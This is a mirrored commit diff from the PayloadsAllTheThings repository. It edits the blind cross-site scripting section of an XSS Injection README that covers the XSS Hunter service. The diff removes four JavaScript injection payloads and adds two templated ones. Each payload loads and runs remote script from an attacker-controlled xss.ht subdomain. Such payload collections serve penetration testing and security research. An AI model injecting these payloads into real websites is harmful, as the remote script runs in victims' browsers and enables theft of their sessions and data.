gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 15:49:38 -08:00
Code Issues Packages Projects Releases Wiki Activity

ADFS Golden SAML

Browse Source
This commit is contained in:
Swissky
2022-11-07 10:10:21 +01:00
parent c17ae602fc
commit 3e9ef2efbe
7 changed files with 73 additions and 12 deletions
Download Patch File Download Diff File Expand all files Collapse all files

11
XSS Injection/README.md
View File

@@ -501,14 +501,9 @@ XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https:
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
```javascript
"><script src=//yoursubdomain.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//yoursubdomain.xss.ht");a.send();</script>
<script>$.getScript("//yoursubdomain.xss.ht")</script>
```xml
"><script src=//<your.subdomain>.xss.ht></script>
<script>$.getScript("//<your.subdomain>.xss.ht")</script>
```
### Other Blind XSS tools